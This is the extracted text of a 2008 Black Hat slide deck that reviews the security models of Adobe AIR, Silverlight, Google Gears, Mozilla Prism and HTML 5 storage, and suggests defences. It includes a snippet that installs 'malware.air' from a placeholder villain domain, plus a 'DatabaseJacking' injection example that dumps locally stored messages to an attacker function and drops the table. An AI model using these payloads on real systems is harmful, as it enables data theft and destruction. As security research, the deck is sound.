BH_US_08_Stamos_Thie.. - Hakim

What’s a RIA?“Rich Internet Applications”Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAs with “Web 2.0”, ill-definedMay contain some of the following ingredients:AJAXy FlashinessLocal storage“Offline mode”Decoupling from the browserAccess to lower level OS resources: sockets, hardwaredevicesAppearance of a traditional desktop applicationOur research has shown a huge disparity in features andsecurity design

What’s a RIA?Party like it’s 1997Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webConstantly updating content!Push technology!No more browsers!

Why use a RIA?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web“Web 2.0” no longer gets you VC fundingNever learned any real programming languagesTo increase responsiveness — distribute data storesbetween server and clientDesktop integration — take advantage of OS UIfunctionalityIn short, web developers can now write full “desktop”apps. This could be good or bad.

RIA FrameworksLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAdobe AIRMicrosoft SilverlightGoogle GearsMozilla Prism

RIA FrameworksFight!Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web

Adobe AIRQuick SummaryLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webRuns disconnectedStandalone appPrivileged OS accessCan launch itselfLocal data storageHas an installerRaw network socketsCross-domain XHRDedicated session managementCan talk to the calling DOMIPC mechanismsProper SSL security✓✓✓✓✓✓✓✓✓✓✗

Adobe AIRWhat is Adobe AIR?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webFull-featured desktop runtime based upon Adobe FlashtechnologyCross-browser, cross-platformApplications can be created with:Adobe Flex 3Adobe Flash CS3HTML and JS using free toolsAIR intended to be more powerful than a browser-basedRIAThere is no sandbox around the applicationAIR apps run with the full powers of the user

Adobe AIRWhat is Adobe AIR?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSo it’s just like a Win32 program in the eyes of a securityanalyst?Um, not reallyPower of AIR is the “I” in “RIA”Can be invoked by browser with arguments, like ActiveX orFlashHas many native mechanisms for loading external contentHighly likely that developers will utilize Internet content.That’s the point.

Adobe AIRWhat is Adobe AIR?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAIR is best thought of as an ActiveX analogue and notlike Flash++Code runs with full privileges, can install malwareNative mechanisms allow for interaction with untrustedworldFortunately, Adobe has seemed to learn some lessons fromActiveX

Adobe AIRAdobe AIR Security ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webBy default, code included in AIR application has full rightsNew functionality in privileged APIs added to JavaScriptand ActionScriptSome restrictions on interacting with desktop in AIR 1.0Existing capabilities can be chained to run native codeRumors of additional native code capabilities in futurereleases

Adobe AIRAdobe AIR Security ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webNo “code access security” model as understood on othersystems, such as Java or .NetInstead, five pre-defined sandboxes with fixed capabilitiesApplication — Full perms. Default for code included withAIR appRemote — Code downloaded from internet. Browser-likepermissionsThree intermediate permissions for local SWFs

Adobe AIRAdobe AIR Security ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAIR has many ways of loading executable content to run,such as HTML/JS and SWFsAlso many ways of getting external untrusted dataNetwork trafficArguments from browser invocationCommand line argumentsApplication SandboxIs not supposed to be able to dynamically generate codeeval() is best example in JSGoal is to eliminate XSS and injection attacks that haveplagued Flash apps that have more kick with localprivileges

Adobe AIRAdobe AIR Security ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webDefault for remotely loaded code is Remote sandboxCannot access new dangerous classes, like FileStream()Can access eval() and other dynamic methodsCan be granted cross-domain XHRShould be sufficient for most of the content developerswould want from Internet, such as HTML or movie SWFs

Adobe AIRInstalling AIRLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAIR requires Flash, not currently includedCan be installed via external binary or inside of Flash:

Adobe AIRInstalling an AIR ApplicationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAIR applications can be bundled as binaries (*.air)Can also be installed by a web page from inside a SWFv a r u r l : S t r i n g = " http :// www . cybervillains . com / malware . air " ;v a r r u n t i m e V e r s i o n : S t r i n g = " 1.0 " ;v a r arguments : A r ray = [ " launchFromBrowser " ] ;airSWF . i n s t a l l A p p l i c a t i o n ( u r l , r u n t i m e V e r s i o n , arguments ) ;

Adobe AIRInstalling an AIR ApplicationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAdobe supports signing AIR applications with commercialcertificatesGives you this prompt:Notice the default selection

Adobe AIRInstalling an AIR ApplicationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webUnfortunately, they also support self-signed certificatesGives you this prompt:

Adobe AIRInstalling an AIR ApplicationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webHmm, looks familiar. . .

Adobe AIRInstalling an AIR ApplicationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webActually, looks more like pre-IE7 ActiveXWhat am I complaining about? They give the correctinformationTrue, but so did ActiveXAllowing users to install signed applets is dangerous enoughAllowing self-signed (which is same as unsigned) isterrifyingThe popularity of ActiveX and the ability of web sites topop open prompts made it the premier malware seedingmechanismAdobe Flash is more popular than IE ever wasIt’s almost impossible to install ActiveX now. That’s notan accident.

Adobe AIRInstalling an AIR ApplicationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webOur suggestionsChange default actionAdd a countdown timer to discourage mindlessclickthroughThere is already a registry key to disable unsigned installprompts, turn it on by defaultStop advertising self-signed AIR applications onAdobe.comThere is perhaps room for something between AIR andFlash without the rootkit abilities

Questions about SilverlightLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webRuns disconnected✓Standalone app✗Privileged OS access✗Can launch itself✗Local data storage✓Has an installer✓Raw network sockets✓Cross-domain XHR✓Dedicated session management . . .Can talk to the calling DOM ✓IPC mechanisms✗Proper SSL security . . .

Microsoft SilverlightWhat is Microsoft Silverlight?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webBrowser plugin with comparable functionality to Adobe FlashCross-browser, cross-platformUtilizes XAML to render content in browserTwo supported versions

Microsoft SilverlightWhat is Microsoft Silverlight?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webThe Silverlight application UI is rendered using ExtensibleApplication Markup Language (XAML)XAML was introduced as a part of the WindowsPresentation Foundation Framework (WPF) starting with.NET Framework 3.0Markup language which declares UI objects that aremapped to partial class definitions

Microsoft SilverlightWhat is Microsoft Silverlight?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webHello World with XAML:H e l l o World !XAML objects map to classes or structures and theirattributes map to events or propertiesSilverlight plugin renders UI elementsDepending on the programming model employed, XAMLcan interact with Javascript, managed code, or both

Microsoft SilverlightWhat is Microsoft Silverlight?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSilverlight 1.0Javascript + XAMLNo access to OS resourcesJavascript is required for instantiation of the plugin andprogramming logicThe plugin renders XAML content1 MB install

Microsoft SilverlightWhat is Microsoft Silverlight?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSilverlight 2.0Javascript + XAML + Managed code and CoreCLRBased on .NET CLR with a security model whichsandboxes execution of managed codeAlso supports interaction with JavaScript4 MB install

Programming ModelsXAML and JavascriptLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webScript-behind programming modelPlugin is instatiated with Javasript Silverlight APIXAML is parsed into object tree mapping UserControlobjects to Javascript object modelXAML event attributes are handled by JavascriptJavascript can create and load XAML dynamicallySpecial Downloader object is based on XMLHttpRequestobjectDownloads content asynchronyously, only supports GET,packages of files can be downloaded as compressed folders

Programming ModelsXAML, Javascript and Managed CodeLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webManaged code-behind programming modelOnly supported by Silverlight 2.0Plugin can be instantiated with either managed code orJavascript Silverlight APIIf the x:class attribute of the root XAML element existsthe XAML objects will be mapped to the Page class of thespecified namespaceThis attribute is necessary for managed code-behindinteraction

Instantiation and DeploymentInstantiationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webThe Silverlight plugin must be embedded as an object in theHTML page:Tag can either be coded manuallyOr generated with Javascript helper functions

Instantiation and DeploymentInstantiationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webHelper functions provided by Silverlight.js, included in theSilverlight SDKGenerated by string concatenation of parameters passed incall to Silverlight.createObject()f u n c t i o n c r e a t e S i l v e r l i g h t ( ) {S i l v e r l i g h t . c r e a t e O b j e c t (" Page . xaml " , // SourceparentElement , // DOM r e f e r e n c e to h o s t i n g DIV tag ." myPlugin " , // Unique plug−i n ID v a l u e .{ // Plug−i n p r o p e r t i e s .width : ’ 6 0 0 ’ , // Width o f r e c t a n g u l a r r e g i o n o f p l u g i nh e i g h t : ’ 2 0 0 ’ , // H e i g h t o f r e c t a n g u l a r r e g i o n o f p l u g i nv e r s i o n : ’ 1 . 0 ’ // Plug−i n v e r s i o n to use .} ,{ } , // No e v e n t s d e f i n e d −− use empty l i s t ." param1 , param2 " ) ; // I n i t P a r a m s p r o p e r t y v a l u e .}

Instantiation and DeploymentInstantiationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webDifferent helper functions if hosted with MicrosoftSilverlight Streaming, onhttp://silverlight.live.comGenerated by string concatenation of parameters passed inapplication manifest, an XAML file packaged withuploaded applicationCan be invoked with a control which references Javascriptfrom Microsft domain. . .

Instantiation and DeploymentInstantiationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web

Instantiation and DeploymentInstantiationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webThe only mandatory parameter is the sourceOBJECT source = path to a zipped folder (.XAP file) onthe server hosting the Silverlight applicationSilverlight.createObject() source = path to the XAML fileon the server hosting the Silverlight application" Page . xaml " , // Source

Instantiation and DeploymentInstantiationLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webHowever there are quite a few optional parameters:enableHtmlAccess = boolean specifying whether theSliverlight plugin allows hosted content access to thebrowser DOMinitParams = user defined key/value pairs loaded uponinitialization, similar to flashVarsAs well as optional events:onLoad = code initiated when the plugin is succesfullyinstantiated; XAML has been parsed and an object treehas been generated

Instantiation and DeploymentDeploymentLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webWhen deployed with the OBJECT tag:.XAP file contains the application dlls, the applicationmanifest and any localized reference dlls.XAP file is cached in the browser upon download.XAP is just a .ZIP (and can be deployed with thatextension as well)So I can download the application code, unzip,dissasemble with a tool like .NET Reflector [1]

Instantiation and DeploymentDeploymentLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webWhen deployed with the Silverlight.createObject() helperfunction:XAML file is compiled and an object tree generatedIf the x:class attribute is defined in the root element of theXAML, managed code initializes the pluginManaged code is streamed to the application on demand

Silverlight 2.0HTML BridgeLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webManaged code can reference DOM elements and Javascript ifthe source path is on the same domain as the hosting pageIf enableHtmlAccess = true managed code has full accessto DOM and Javascript through theSystem.Windows.Browser namespaceHtmlDocument doc = HtmlPage . Document ;doc . GetElementById ( " button " ) . AttachEvent ( " click " ,new E v e n t H a n d l e r ( t h i s . C a l l G l o b a l J S M e t h o d ) ) ;p r i v a t e v o i d C a l l G l o b a l J S M e t h o d ( o b j e c t o , EventArgs e ) {HtmlPage . Window . I n v o k e ( " globalJSMethod " , arg1 ) ;}

Silverlight 2.0HTML BridgeLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webIf enableHtmlAccess = false, managed code cannot obtainreferences to the DOM or Javascript, except in thefollowing scenario:The managed code exposes Scriptable entry points whichtake ScriptObject types as input parametersJavascript calls the Scriptable method and passes DOMelements or Javascript references to manged code

Interaction with DOM and JavascriptCrossdomain AccessLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webCross-domain communication with the DOM and Javascript isgoverned by enableHtmlAccess parameter as well as theapplication manifestAn attribute of the root element of the applicationmanifest AllowExternalCallersFromXDomain can be set tothe following enum values:1 No Access: Default setting which prevents all cross domainaccess2 Full Access: Full cross domain access to DOM andJavascript3 ScriptableOnly: Only allow access through Scriptable entrypoints

Interaction with DOM and JavascriptCrossdomain AccessLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webA second attribute AllowInboundCallsFromXDomain canbe set to:true: Managed code is exposed to crossdomain Javascriptfalse: No crossdomain Javascript can access managed code

Interaction with DOM and JavascriptCrossdomain AccessLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webIf hosted on Microsoft Live:The remotely hosted app can only communicate with theweb page through the key/value pairs passed in initParamsinitParams are loaded during execution of the initalizationfunction, after load they are set to read-only

Silverlight 2.0Managed CodeLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSilverlight version of the .NET framework has been trimmeddown to expose only the functionality that Silverlightdevelopers deemed necessary:CollectionsLINQ to objectsLINQ to XMLIsolated StorageNetworkingThreadingXML DOM

CoreCLR Security ModelTransparency ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webAccess to dangerous functions is goverend by the CoreCLRThere is no such thing as code access security (CAS) inSilverlightCAS has been replaced by a security model referred to asthe “transparency model”Although namespaces retain same names, Silverlight codecan only reference libraries shipped with the Silverlightversion of the .NET framework

CoreCLR Security ModelTransparency ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webThe transparency model breaks up code into three levels withthree security attributes:1 SecurityTransparentAttribute2 SecuritySafeCriticalAttribute3 SecurityCriticalAttribute

CoreCLR Security ModelSecurity AttributesLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSecurityTransparentAttributeSame privelege level as code without a security attributedefinedUntrusted code that cannot call any functions or accessany fields that elevate the call stack.This is the default privlege level of all application codeCan also be platform codes t a t i c I s o l a t e d S t o r a g e F i l e ( ) ;

CoreCLR Security ModelSecurity AttributesLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSecuritySafeCriticalAttributePartial trust code that acts as the gateway betweentransparent code and full trust code.This security attribute was intoduced with Silverlight 2.0Assemblies containing code marked withSecuritySafeCritical attribute must be signed withMicrosoft public key.[ S e c u r i t y S a f e C r i t i c a l ]p u b l i c s t a t i c I s o l a t e d S t o r a g e F i l e G e t U s e r S t o r e F o r A p p l i c a t i o n ( ) ;

CoreCLR Security ModelSecurity AttributesLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSecurityCriticalAttributeFull trust code that can access OS resources such asfilesystemAssemblies containing code marked withSecuritySafeCritical attribute must be signed withMicrosoft public key.[ S e c u r i t y C r i t i c a l ]p r i v a t e s t a t i c s t r i n g F e t c h O r C r e a t e S t o r e ( s t r i n g groupName , s t r i n gstoreName , I s o l a t e d S t o r a g e F i l e i s f )

CoreCLR Security ModelTransparency ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSecuritySafeCritical code acts as the gatekeeper of the sandboxThe CoreCLR only allows transparent code(SecurityTransparent or SecuritySafeCritcal) to executeSecuritySafeCritical code is the only code that can callSecurityCritical methodsSo can’t I make my own custom assemblies and define theSecuritySafeCritical attribute?

CoreCLR Security ModelTransparency ModelLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webNot if Microsoft can help it:The CoreCLR prevents us from defining anything in mycustom assemblies as SecuritySafeCriticalWhen code with the security attribute SecuritySafeCriticalattempts to execute in the CoreCLR:The loading assembly is verfied with a Microsoft keyThe path of the loading assembly is checked against theSilverlight install directoryThe CoreCLR effectively ignores any attempts to callunverified SecuritySafeCritical code

Interaction with the Operating SystemFile SystemLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webFile SystemIsolated storage is available to the Silverlight applicationthrough the System.IO.IsolatedStorage namespaceThe default storage quota is 1 MB, and data is stored inthe local application settings folder of the userWhen local storage is requested by an SL app,identification strings are generated, ids are based onpathname of applicationThe same isolated storage directory will be accesible byany SL app with the same application and group IDs

Interaction with the Operating SystemFile SystemLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSilverlight 2.0 ships with a Silverlight configuration utilityUsing the configuration utility, the user has the option toDisallow access to isolated storage completely,Allow access to isolated storage on a site by site basis,Configure the default storage quota

Interaction with the Operating SystemFile SystemLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web

Interaction with the Operating SystemNetwork SocketsLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webNetwork sockets are available to the Silverlightapplications through the System.Net.Sockets namespaceCurrently only supports TCP socketsSocket connections can only push data to the clientSocket connections can be initiated only between theclient and the site of origin of the SL app, unless thereexists a crossdomainpolicy.xml or clientaccesspolicy.xml inthe root directory of the remote path

NetworkingHTTP RequestsLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSilverlight 1.0 uses a Javascript object model similar toXmlHttpRequestSilverlight 2.0 uses WebClient

Questions about GearsLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webRuns disconnected✓Standalone app✗Privileged OS access✗Can launch itself✗Local data storage✓Has an installer✗Raw network sockets✗Cross-domain XHR✗Dedicated session management ✗Can talk to the calling DOM . . .IPC mechanisms✗Proper SSL security . . .

Google GearsLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webUses a homegrown API for synchronizing dataLocal SQLite instance used for data storageLocalServer hosts content locally for offline accessWorks offline via SQL database, local assets, and a localapp server, LocalServerLocalServer acts as a broker between the browser andwebserverChanges behavior depending on online status

Google GearsSecurity mechanismsLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webUses same origin to restrict access to site databases andLocalServer resource captureProvides for parameterized SQLOpt-in user dialogGears 0.3 allows for “customization” of this dialog. . .

Google GearsWin! j/k failLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web

Google GearsHere to stay?Living in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webSeen very limited adoption thus farMost of the functionality is included in the HTML 5 specSo, moving on. . .

Mozilla PrismQuick SummaryLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webRuns disconnectedStandalone appPrivileged OS accessCan launch itselfLocal data storageHas an installerRaw network socketsCross-domain XHRDedicated session managementCan talk to the calling DOMIPC mechanismsProper SSL security✗✓✗✗✓✗✗✗✗✗✗✓

Mozilla PrismLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webFormerly WebRunner — wraps webapps to appear asdesktop appsStandalone browser instance, restricted to one domainExternal links open a regular browserSeparate user profileCertificate errors are a hard failure

Mozilla PrismLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webConsists of a webapp bundle with id, URI, CSS, scriptingand UI rules in an INI:[ Parameters ]i d=i s e c . s i t e @ i s e c p a r t n e r s . comu r i=h t t p s : / /www. i s e c p a r t n e r s . com/i c o n=i s e cs t a t u s=nol o c a t i o n=nos i d e b a r=non a v i g a t i o n=no

Mozilla PrismExample bundlesLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web

Mozilla PrismBundlesLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webJavascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)Script in 3rd-party bundles allows modifying browserbehavior just like an extensionUnlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles

Mozilla PrismPrism Install UILiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the web

Mozilla PrismAbuseLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webLooks like a bookmark dialogNo warnings for installFull XPCOM scripting privilegesLow bar for trojans and malicious code — a maliciousbrowser extension, but with no code signing or warning

Mozilla PrismDemoLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webDemo

HTML 5New “features” in Firefox and WebKitLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webIntroduces DOM storage — sessionStorage andlocalStoragesessionStorage stores arbitrary amounts of data for a singlesessionlocalStorage persists beyond the session — never expires,limited to 5MDatabase storage via openDatabase()All expected to be same-origin

DOM StorageLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webThe major goals of DOM storage — more storage spaceand real persistenceCookies considered too smallUsers delete cookies, or won’t accept themDOM storage bypasses pesky usersHowever, pesky users can use:about:config dom.storage.enabled = false

Browser-based SQL DatabasesDatabaseJackingLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webInjection attacks become far more damaging when you caninsert code like this:v a r db=openDatabase ( "e- mail " , [ ] , "My precious e- mail " , " 3.14 " ) ;a l l m e s s a g e s=db . e x e c u t e S q l ( " SELECT * FROM MSGS " , [ ] , f u n c t i o n ( r e s u l t s ) {s e n d T o A t t a cker ( r e s u l t s ) ; }) ;db . e x e c u t e S q l ( " DROP TABLE MESSAGES " , [ ] , f u n c t i o n ( ) {a l e r t ( " lol " ) ; }) ;

Firefox 3Mozilla-specific issuesLiving in theRIA WorldIntroductionWho are we?What’s a RIA?Why use RIA?FrameworksAdobe AIRMS SilverlightGoogle GearsMozilla PrismHTML 5AttackScenariosRIA vs OSRIA vs the webCross-Site XMLHttpRequest — removed in late FF3betas, but it may returnglobalStorageFF2 has weak same-origin restrictionsFF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorageThe RIA world is totally SQL-happyDownloads, cookies, form history, search history, etc, allstored in local SQLite databasesWhy?? This data isn’t relational.

